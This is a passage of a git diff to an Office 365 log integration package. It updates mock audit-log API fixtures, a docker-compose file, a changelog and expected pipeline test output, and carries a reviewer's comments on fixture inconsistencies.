Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot1234.png","SourceFileName":"Screenshot1234.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot1234.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"90633f47-25f0-4e8a-bcfc-08d7b17b4e60","UserType":0}] - path: /api/v1.0/test-cel-tenant-id/activity/feed/subscriptions/content methods: [GET] query_params: @@ -374,5 +181,6 @@ rules: headers: Content-Type: - "application/json" + # 2 documents body: |- [{"ObjectId":"Sales","Id":"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594","CreationTime":"2020-02-28T09:42:45","UserKey":"100320009d6edf94","YammerNetworkId":5846122497,"Operation":"GroupCreation","ClientIP":"79.159.10.151:12345","ActorYammerUserId":36787265537,"UserType":0,"ResultStatus":"TRUE","RecordType":22,"Workload":"Yammer","Version":1,"GroupName":"Sales","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"alice@testsiem2.onmicrosoft.com","ActorUserId":"alice@testsiem2.onmicrosoft.com"},{"CreationTime":"2020-02-28T09:39:20","ActorUserId":"asr@testsiem2.onmicrosoft.com","ObjectId":"Company group","UserKey":"100320009d292e16","Id":"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06","ActorYammerUserId":36085768193,"ClientIP":"[fdfd::555]:12346","UserId":"asr@testsiem2.onmicrosoft.com","Operation":"GroupCreation","ResultStatus":"TRUE","UserType":0,"Workload":"Yammer","Version":1,"OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","YammerNetworkId":5846122497,"RecordType":22,"GroupName":"Company group"}] 
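Review bot: The `Id` of the first document in the celid2b body (`dc04ab19-0b43-4g79-cdc8-08d7abecf317`) is not a valid UUID, since `g` is not a hex digit, so this fixture no longer resembles a real audit record id; whether the pipeline or the dedup logic validates that field cannot be seen from this hunk, but a hex-only value (for example `dc04ab19-0b43-4a79-cdc8-08d7abecf317`) keeps the test from relying on lenient id handling. In both the celid2a and celid2b bodies, `SourceFileName` reads `Screenshot 2020-01-27 at 112.30.48.png` while the corresponding `ObjectId` ends in `12.30.48.png`; if they are meant to describe the same file the two values should agree. The celid2a response also lacks the document-count comment that the neighbouring endpoints carry, so `# 2 documents` above its `body: |-` would keep the fixtures consistent.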
diff --git a/packages/o365/_dev/deploy/docker/docker-compose.yml b/packages/o365/_dev/deploy/docker/docker-compose.yml
index f2161671934..5a377a8e92e 100644
--- a/packages/o365/_dev/deploy/docker/docker-compose.yml
+++ b/packages/o365/_dev/deploy/docker/docker-compose.yml
@@ -1,17 +1,5 @@
 version: '2.3'
 services:
- o365:
- image: docker.elastic.co/observability/stream:v0.5.0
- ports:
- - 8080
- environment:
- PORT: "8080"
- volumes:
- - ./config.yml:/config.yml
- command:
- - http-server
- - --addr=:8080
- - --config=/config.yml
 o365-cel:
 image: docker.elastic.co/observability/stream:v0.5.0
 ports:
diff --git a/packages/o365/changelog.yml b/packages/o365/changelog.yml
index 604c127ebbb..4337c3e3365 100644
--- a/packages/o365/changelog.yml
+++ b/packages/o365/changelog.yml
@@ -1,4 +1,29 @@
 # newer versions go on top
+- version: "2.3.2"
+ changes:
+ - description: Improve handling of o365.audit.OperationProperties.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9493
+- version: "2.3.1"
+ changes:
+ - description: Check contentExpiration timestamp before requesting contents.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9477
+- version: "2.3.0"
+ changes:
+ - description: Set sensitive values as secret and fix incorrect mappings.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
+- version: "2.2.2"
+ changes:
+ - description: Fix dashboard panel filters
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/8983
+- version: "2.2.1"
+ changes:
+ - description: Prevent tenant ID being rendered into debug logs.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9017
 - version: "2.2.0"
 changes:
 - description: Expose OAuth2 token scopes configuration value.
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json index 75fafaec42b..258816ba7ab 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json @@ -36,27 +36,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -120,19 +120,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -218,27 +218,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -302,19 +302,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -400,27 +400,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -484,19 +484,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -582,27 +582,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -667,27 +667,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -773,27 +773,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -858,27 +858,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -964,27 +964,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1062,27 +1062,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1168,27 +1168,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -1266,27 +1266,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1372,27 +1372,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1470,27 +1470,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -1576,27 +1576,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1674,27 +1674,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1780,27 +1780,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -1878,27 +1878,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1984,27 +1984,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2082,27 +2082,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -2188,27 +2188,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2286,27 +2286,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2392,27 +2392,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -2490,27 +2490,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2596,27 +2596,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2694,27 +2694,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -2800,27 +2800,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2898,27 +2898,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3004,27 +3004,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -3102,27 +3102,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3208,27 +3208,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3306,27 +3306,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -3412,27 +3412,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3510,27 +3510,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3616,27 +3616,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
